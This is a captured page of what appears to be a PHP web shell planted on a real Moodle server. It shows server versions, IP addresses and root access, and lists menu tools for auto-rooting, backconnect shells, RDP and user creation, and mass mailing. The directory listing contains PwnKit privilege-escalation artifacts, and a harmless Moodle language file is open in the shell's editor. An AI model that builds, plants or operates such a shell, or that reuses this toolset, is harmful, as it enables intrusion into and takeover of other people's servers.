Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
lang /
en /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
access.php
1.7
KB
-rwxrwxrwx
admin.php
120.93
KB
-rwxrwxrwx
auth.php
12.49
KB
-rwxrwxrwx
backup.php
16.61
KB
-rwxrwxrwx
badges.php
24.56
KB
-rwxrwxrwx
block.php
4.82
KB
-rwxrwxrwx
blog.php
10.88
KB
-rwxrwxrwx
bulkusers.php
2.15
KB
-rwxrwxrwx
cache.php
9.73
KB
-rwxrwxrwx
calendar.php
10.81
KB
-rwxrwxrwx
cohort.php
2.61
KB
-rwxrwxrwx
completion.php
12.16
KB
-rwxrwxrwx
condition.php
7.58
KB
-rwxrwxrwx
countries.php
8.54
KB
-rwxrwxrwx
currencies.php
6.62
KB
-rwxrwxrwx
dbtransfer.php
1.86
KB
-rwxrwxrwx
debug.php
3.1
KB
-rwxrwxrwx
editor.php
6.73
KB
-rwxrwxrwx
edufields.php
22.9
KB
-rwxrwxrwx
enrol.php
7.73
KB
-rwxrwxrwx
error.php
43.74
KB
-rwxrwxrwx
filters.php
3.87
KB
-rwxrwxrwx
form.php
3.28
KB
-rwxrwxrwx
grades.php
45.54
KB
-rwxrwxrwx
grading.php
5.24
KB
-rwxrwxrwx
group.php
10.37
KB
-rwxrwxrwx
hub.php
18.49
KB
-rwxrwxrwx
imscc.php
2.11
KB
-rwxrwxrwx
install.php
26.06
KB
-rwxrwxrwx
iso6392.php
16.04
KB
-rwxrwxrwx
langconfig.php
2.16
KB
-rwxrwxrwx
license.php
1.36
KB
-rwxrwxrwx
mathslib.php
2.06
KB
-rwxrwxrwx
media.php
3.39
KB
-rwxrwxrwx
message.php
8.06
KB
-rwxrwxrwx
mimetypes.php
2.78
KB
-rwxrwxrwx
mnet.php
20.37
KB
-rwxrwxrwx
moodle.php
113.63
KB
-rwxrwxrwx
my.php
689
B
-rwxrwxrwx
notes.php
2.67
KB
-rwxrwxrwx
pagetype.php
1.91
KB
-rwxrwxrwx
pix.php
1.57
KB
-rwxrwxrwx
plagiarism.php
748
B
-rwxrwxrwx
plugin.php
10.22
KB
-rwxrwxrwx
portfolio.php
14.26
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
question.php
33.99
KB
-rwxrwxrwx
rating.php
3.02
KB
-rwxrwxrwx
repository.php
13.2
KB
-rwxrwxrwx
role.php
25.26
KB
-rwxrwxrwx
search.php
3.58
KB
-rwxrwxrwx
table.php
1.33
KB
-rwxrwxrwx
tag.php
3.97
KB
-rwxrwxrwx
timezones.php
18.44
KB
-rwxrwxrwx
userkey.php
1.98
KB
-rwxrwxrwx
webservice.php
16.75
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : filters.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Strings for component 'filters', language 'en', branch 'MOODLE_20_STABLE' * * @package filters * @copyright 1999 onwards Martin Dougiamas {@link http://moodle.com} * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ $string['actfilterhdr'] = 'Active filters'; $string['addfilter'] = 'Add filter'; $string['anycategory'] = 'any category'; $string['anycourse'] = 'any course'; $string['anyfield'] = 'any field'; $string['anyrole'] = 'any role'; $string['anyvalue'] = 'any value'; $string['applyto'] = 'Apply to'; $string['categoryrole'] = 'Category role'; $string['contains'] = 'contains'; $string['content'] = 'Content'; $string['contentandheadings'] = 'Content and headings'; $string['courserole'] = 'Course role'; $string['courserolelabel'] = '{$a->label} is {$a->rolename} in {$a->coursename} from {$a->categoryname}'; $string['courserolelabelerror'] = '{$a->label} error: course {$a->coursename} does not exist'; $string['datelabelisafter'] = '{$a->label} is after {$a->after}'; $string['datelabelisbefore'] = '{$a->label} is before {$a->before}'; $string['datelabelisbetween'] = '{$a->label} is between {$a->after} and {$a->before}'; $string['defaultx'] = 'Default ({$a})'; $string['disabled'] = 'Disabled'; $string['doesnotcontain'] = 'doesn\'t contain'; $string['endswith'] = 'ends with'; $string['filterallwarning'] = 'Applying filters to headings as well as content can greatly increase the load on your server. Please use that \'Apply to\' settings sparingly. The main use is with the multilang filter.'; $string['filtersettings'] = 'Filter settings'; $string['filtersettings_help'] = 'This page lets you turn filters on or off in a particular part of the site. Some filters may also let you set local settings, in which case there will be a settings link next to their name.'; $string['filtersettingsforin'] = 'Filter settings for {$a->filter} in {$a->context}'; $string['filtersettingsin'] = 'Filter settings in {$a}'; $string['firstaccess'] = 'First access'; $string['globalrolelabel'] = '{$a->label} is {$a->value}'; $string['isactive'] = 'Active?'; $string['isafter'] = 'is after'; $string['isanyvalue'] = 'is any value'; $string['isbefore'] = 'is before'; $string['isdefined'] = 'is defined'; $string['isempty'] = 'is empty'; $string['isequalto'] = 'is equal to'; $string['isnotdefined'] = 'isn\'t defined'; $string['isnotequalto'] = 'isn\'t equal to'; $string['neveraccessed'] = 'Never accessed'; $string['nevermodified'] = 'Never modified'; $string['newfilter'] = 'New filter'; $string['nofiltersenabled'] = 'No filter plugins have been enabled on this site.'; $string['off'] = 'Off'; $string['offbutavailable'] = 'Off, but available'; $string['on'] = 'On'; $string['profilelabel'] = '{$a->label}: {$a->profile} {$a->operator} {$a->value}'; $string['profilelabelnovalue'] = '{$a->label}: {$a->profile} {$a->operator}'; $string['removeall'] = 'Remove all filters'; $string['removeselected'] = 'Remove selected'; $string['selectlabel'] = '{$a->label} {$a->operator} {$a->value}'; $string['startswith'] = 'starts with'; $string['tablenosave'] = 'Changes in table above are saved automatically.'; $string['textlabel'] = '{$a->label} {$a->operator} {$a->value}'; $string['textlabelnovalue'] = '{$a->label} {$a->operator}';
Close